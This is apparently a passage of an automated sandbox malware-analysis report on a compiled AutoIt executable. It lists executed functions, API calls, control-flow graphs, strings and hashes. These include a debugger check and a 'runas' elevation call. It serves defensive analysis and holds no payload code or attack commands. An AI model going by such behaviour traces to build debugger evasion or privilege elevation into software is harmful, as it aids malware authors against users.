107430 c460cb 107428->107430 107429->107344 107430->107429 107432 c460ab 59 API calls Mailbox 107430->107432 107432->107430

                                                  Executed Functions

                                                  Function 00BF3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BF3B68
                                                  • IsDebuggerPresent.KERNEL32 ref: 00BF3B7A
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CB52F8,00CB52E0,?,?), ref: 00BF3BEB
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                    • Part of subcall function 00C0092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BF3C14,00CB52F8,?,?,?), ref: 00C0096E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF3C6F
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CA7770,00000010), ref: 00C2D281
                                                  • SetCurrentDirectoryW.KERNEL32(?,00CB52F8,?,?,?), ref: 00C2D2B9
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CA4260,00CB52F8,?,?,?), ref: 00C2D33F
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C2D346
                                                    • Part of subcall function 00BF3A46: GetSysColorBrush.USER32(0000000F), ref: 00BF3A50
                                                    • Part of subcall function 00BF3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00BF3A5F
                                                    • Part of subcall function 00BF3A46: LoadIconW.USER32(00000063), ref: 00BF3A76
                                                    • Part of subcall function 00BF3A46: LoadIconW.USER32(000000A4), ref: 00BF3A88
                                                    • Part of subcall function 00BF3A46: LoadIconW.USER32(000000A2), ref: 00BF3A9A
                                                    • Part of subcall function 00BF3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF3AC0
                                                    • Part of subcall function 00BF3A46: RegisterClassExW.USER32(?), ref: 00BF3B16
                                                    • Part of subcall function 00BF39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF3A03
                                                    • Part of subcall function 00BF39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3A24
                                                    • Part of subcall function 00BF39D5: ShowWindow.USER32(00000000,?,?), ref: 00BF3A38
                                                    • Part of subcall function 00BF39D5: ShowWindow.USER32(00000000,?,?), ref: 00BF3A41
                                                    • Part of subcall function 00BF434A: _memset.LIBCMT ref: 00BF4370
                                                    • Part of subcall function 00BF434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF4415
                                                  Strings
                                                  • This is a third-party compiled AutoIt script., xrefs: 00C2D279
                                                  • runas, xrefs: 00C2D33A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3287110873
                                                  • Opcode ID: 93e3ed5c2d52c9626d72603e648192f6241f8eec1c664d0460c1f5cd1854ec4f
                                                  • Instruction ID: 9768666b2124134d592eb4f57d723d3a49cc575d0d6be9e5a2b09ffd28f2dc2d
                                                  • Opcode Fuzzy Hash: 93e3ed5c2d52c9626d72603e648192f6241f8eec1c664d0460c1f5cd1854ec4f
                                                  • Instruction Fuzzy Hash: BE51C57094920CAADF11EBB4EC55BFD7BF4EF15700F0041E9F656A71A2CA704A49CB22
                                                  Function 00BF49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 942 bf49a0-bf4a00 call bf7667 GetVersionExW call bf7bcc 947 bf4b0b-bf4b0d 942->947 948 bf4a06 942->948 949 c2d767-c2d773 947->949 950 bf4a09-bf4a0e 948->950 951 c2d774-c2d778 949->951 952 bf4a14 950->952 953 bf4b12-bf4b13 950->953 955 c2d77a 951->955 956 c2d77b-c2d787 951->956 954 bf4a15-bf4a4c call bf7d2c call bf7726 952->954 953->954 964 c2d864-c2d867 954->964 965 bf4a52-bf4a53 954->965 955->956 956->951 958 c2d789-c2d78e 956->958 958->950 960 c2d794-c2d79b 958->960 960->949 962 c2d79d 960->962 966 c2d7a2-c2d7a5 962->966 967 c2d880-c2d884 964->967 968 c2d869 964->968 965->966 969 bf4a59-bf4a64 965->969 970 c2d7ab-c2d7c9 966->970 971 bf4a93-bf4aaa GetCurrentProcess IsWow64Process 966->971 976 c2d886-c2d88f 967->976 977 c2d86f-c2d878 967->977 972 c2d86c 968->972 973 bf4a6a-bf4a6c 969->973 974 c2d7ea-c2d7f0 969->974 970->971 975 c2d7cf-c2d7d5 970->975 978 bf4aaf-bf4ac0 971->978 979 bf4aac 971->979 972->977 980 c2d805-c2d811 973->980 981 bf4a72-bf4a75 973->981 984 c2d7f2-c2d7f5 974->984 985 c2d7fa-c2d800 974->985 982 c2d7d7-c2d7da 975->982 983 c2d7df-c2d7e5 975->983 976->972 986 c2d891-c2d894 976->986 977->967 987 bf4b2b-bf4b35 GetSystemInfo 978->987 988 bf4ac2-bf4ad2 call bf4b37 978->988 979->978 992 c2d813-c2d816 980->992 993 c2d81b-c2d821 980->993 989 c2d831-c2d834 981->989 990 bf4a7b-bf4a8a 981->990 982->971 983->971 984->971 985->971 986->977 991 bf4af8-bf4b08 987->991 1001 bf4b1f-bf4b29 GetSystemInfo 988->1001 1002 bf4ad4-bf4ae1 call bf4b37 988->1002 989->971 995 c2d83a-c2d84f 989->995 996 c2d826-c2d82c 990->996 997 bf4a90 990->997 992->971 993->971 999 c2d851-c2d854 995->999 1000 c2d859-c2d85f 995->1000 996->971 997->971 999->971 1000->971 1004 bf4ae9-bf4aed 1001->1004 1007 bf4b18-bf4b1d 1002->1007 1008 bf4ae3-bf4ae7 GetNativeSystemInfo 1002->1008 1004->991 1006 bf4aef-bf4af2 FreeLibrary 1004->1006 1006->991 1007->1008 1008->1004
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00BF49CD
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • GetCurrentProcess.KERNEL32(?,00C7FAEC,00000000,00000000,?), ref: 00BF4A9A
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00BF4AA1
                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BF4AE7
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00BF4AF2
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BF4B23
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BF4B2F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: eeb60a14ec5f32ac7acd4097455d81e67344f4dea197296eaea532ad9632dabd
                                                  • Instruction ID: 640a6e17381d5bb9b20635ac496eb931cfe40d120f82eeeb02f75561b91b7ee8
                                                  • Opcode Fuzzy Hash: eeb60a14ec5f32ac7acd4097455d81e67344f4dea197296eaea532ad9632dabd
                                                  • Instruction Fuzzy Hash: 0091C331989BC4DEC731CB6894902BBBFF5AF3A300B4449ADD1CB93A42D324A94CD759
                                                  Function 00BF4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1039 bf4e89-bf4ea1 CreateStreamOnHGlobal 1040 bf4ea3-bf4eba FindResourceExW 1039->1040 1041 bf4ec1-bf4ec6 1039->1041 1042 c2d933-c2d942 LoadResource 1040->1042 1043 bf4ec0 1040->1043 1042->1043 1044 c2d948-c2d956 SizeofResource 1042->1044 1043->1041 1044->1043 1045 c2d95c-c2d967 LockResource 1044->1045 1045->1043 1046 c2d96d-c2d98b 1045->1046 1046->1043
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00BF4D8E,?,?,00000000,00000000), ref: 00BF4E99
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BF4D8E,?,?,00000000,00000000), ref: 00BF4EB0
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00BF4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BF4E2F), ref: 00C2D937
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00BF4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BF4E2F), ref: 00C2D94C
                                                  • LockResource.KERNEL32(00BF4D8E,?,?,00BF4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BF4E2F,00000000), ref: 00C2D95F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 1a74386996a2ec740801d9c899ff5b22eb7708268d14061eabb6de45d919959c
                                                  • Instruction ID: 667c31131bc966a553fc548a858b178f8d9656ea053daf98bb1a430d3c592e32
                                                  • Opcode Fuzzy Hash: 1a74386996a2ec740801d9c899ff5b22eb7708268d14061eabb6de45d919959c
                                                  • Instruction Fuzzy Hash: 02118C70200304ABD7258B65EC88F3B7BBAFBC5B11F20826CF60A86250DB61E845C660
                                                  Function 00BFFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID:
                                                  • API String ID: 3964851224-0
                                                  • Opcode ID: 3f7673762c9af9cfbb5894744b3d3fab0f0f45b061e85b78e33ffbde6d452426
                                                  • Instruction ID: 3071267dcb8f5ac55fa99ed3203490d0b064083781e0b0ae4f871ea89c0ed55f
                                                  • Opcode Fuzzy Hash: 3f7673762c9af9cfbb5894744b3d3fab0f0f45b061e85b78e33ffbde6d452426
                                                  • Instruction Fuzzy Hash: 84928A706083418FD724DF14C480B2AB7E1BF89304F25896DF99A8B3A2D775ED85CB92
                                                  Function 00C5445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00C2E398), ref: 00C5446A
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00C5447B
                                                  • FindClose.KERNEL32(00000000), ref: 00C5448B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 557838c8bf95218aa081431e7a6d79dd7288d69045b1ef167c5aa2a0cb1826ae
                                                  • Instruction ID: 8e9137f250d259f748fea034e94f0d2f5b134490c20ca29225366bbcad2b5a1d
                                                  • Opcode Fuzzy Hash: 557838c8bf95218aa081431e7a6d79dd7288d69045b1ef167c5aa2a0cb1826ae
                                                  • Instruction Fuzzy Hash: 55E0D8374145006743146B38EC4D6ED775C9F0533AF100719FD39C10E0E77459C49699
                                                  Function 00BFE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Variable must be of type 'Object'., xrefs: 00C33E62
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.
                                                  • API String ID: 0-109567571
                                                  • Opcode ID: e19a946cbd1e33e45564934d2934324e21abb8510cc63ccf7af4a4bf5da626e3
                                                  • Instruction ID: 6fa043a45a6855104b345fde7d8de441ca02633c556d87436e6adfa0454efc1a
                                                  • Opcode Fuzzy Hash: e19a946cbd1e33e45564934d2934324e21abb8510cc63ccf7af4a4bf5da626e3
                                                  • Instruction Fuzzy Hash: 35A25B75A00209CBCB24CF58C480ABDB7F1FF59314F2481A9EA25AB361D775ED4ACB91
                                                  Function 00C009D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C00A5B
                                                  • timeGetTime.WINMM ref: 00C00D16
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C00E53
                                                  • Sleep.KERNEL32(0000000A), ref: 00C00E61
                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00C00EFA
                                                  • DestroyWindow.USER32 ref: 00C00F06
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C00F20
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C34E83
                                                  • TranslateMessage.USER32(?), ref: 00C35C60
                                                  • DispatchMessageW.USER32(?), ref: 00C35C6E
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C35C82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4212290369-3242690629
                                                  • Opcode ID: c2f80d3e89676ae560388ffc6fe3bbff83140ee3c7ee0786effdda438d2536d0
                                                  • Instruction ID: c37d090b934be823297503d2718d1c15b133aafb83701002939dfbc594963126
                                                  • Opcode Fuzzy Hash: c2f80d3e89676ae560388ffc6fe3bbff83140ee3c7ee0786effdda438d2536d0
                                                  • Instruction Fuzzy Hash: 9FB2F370608741DFD728DF24C884BAEB7E4BF84304F24491DF5A9972A1CB71E989DB92
                                                  Function 00C59155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00C58F5F: __time64.LIBCMT ref: 00C58F69
                                                    • Part of subcall function 00BF4EE5: _fseek.LIBCMT ref: 00BF4EFD
                                                  • __wsplitpath.LIBCMT ref: 00C59234
                                                    • Part of subcall function 00C140FB: __wsplitpath_helper.LIBCMT ref: 00C1413B
                                                  • _wcscpy.LIBCMT ref: 00C59247
                                                  • _wcscat.LIBCMT ref: 00C5925A
                                                  • __wsplitpath.LIBCMT ref: 00C5927F
                                                  • _wcscat.LIBCMT ref: 00C59295
                                                  • _wcscat.LIBCMT ref: 00C592A8
                                                    • Part of subcall function 00C58FA5: _memmove.LIBCMT ref: 00C58FDE
                                                    • Part of subcall function 00C58FA5: _memmove.LIBCMT ref: 00C58FED
                                                  • _wcscmp.LIBCMT ref: 00C591EF
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59824
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59837
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C59452
                                                  • _wcsncpy.LIBCMT ref: 00C594C5
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00C594FB
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C59511
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C59522
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C59534
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 8791e343711698885e4a892747429047c196d35035d017d9f340c8f7285f8375
                                                  • Instruction ID: 70e259dc27004e4c8e5a4368b7ab965156d515e1887db440186a9fba8424e442
                                                  • Opcode Fuzzy Hash: 8791e343711698885e4a892747429047c196d35035d017d9f340c8f7285f8375
                                                  • Instruction Fuzzy Hash: 2DC14CB5D00219ABDF21DF95CC81AEEB7BDEF45310F0040AAF609E7151EB309A899F65
                                                  Function 00BF3025 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 65windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BF3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BF309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BF30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BF30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 097b1ee3b41ca375e36c42c7e2e34155f4d2ac5953c94e0a922c7e69a124d7cb
                                                  • Instruction ID: 9662206b455b111d8ac5d3faa6a0fdace8c436f5aae924e072e8bd38f8886a17
                                                  • Opcode Fuzzy Hash: 097b1ee3b41ca375e36c42c7e2e34155f4d2ac5953c94e0a922c7e69a124d7cb
                                                  • Instruction Fuzzy Hash: F021E4B1941209AFDB50DFA4E889BDDBBF4FB08320F14462EE594E62A0D7B54582CF91
                                                  Function 00BF3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BF3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BF309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BF30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BF30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: f9719c9f7acedf5cd37a3464043de130cbb51affd07ab9cb8987f0dd4802fd55
                                                  • Instruction ID: 2d0d061fd8b33bad87175b0ca203c60c8b68bafabc0c4051a23b780e8b1d251a
                                                  • Opcode Fuzzy Hash: f9719c9f7acedf5cd37a3464043de130cbb51affd07ab9cb8987f0dd4802fd55
                                                  • Instruction Fuzzy Hash: 3521D8B1D41218AFDB00DFA4EC89BDDBBF4FB08710F00822AF514A62A0D7B24585CF91
                                                  Function 00BF708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00BF4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CB52F8,?,00BF37AE,?), ref: 00BF4724
                                                    • Part of subcall function 00C1050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BF7165), ref: 00C1052D
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BF71A8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C2E8C8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C2E909
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C2E947
                                                  • _wcscat.LIBCMT ref: 00C2E9A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
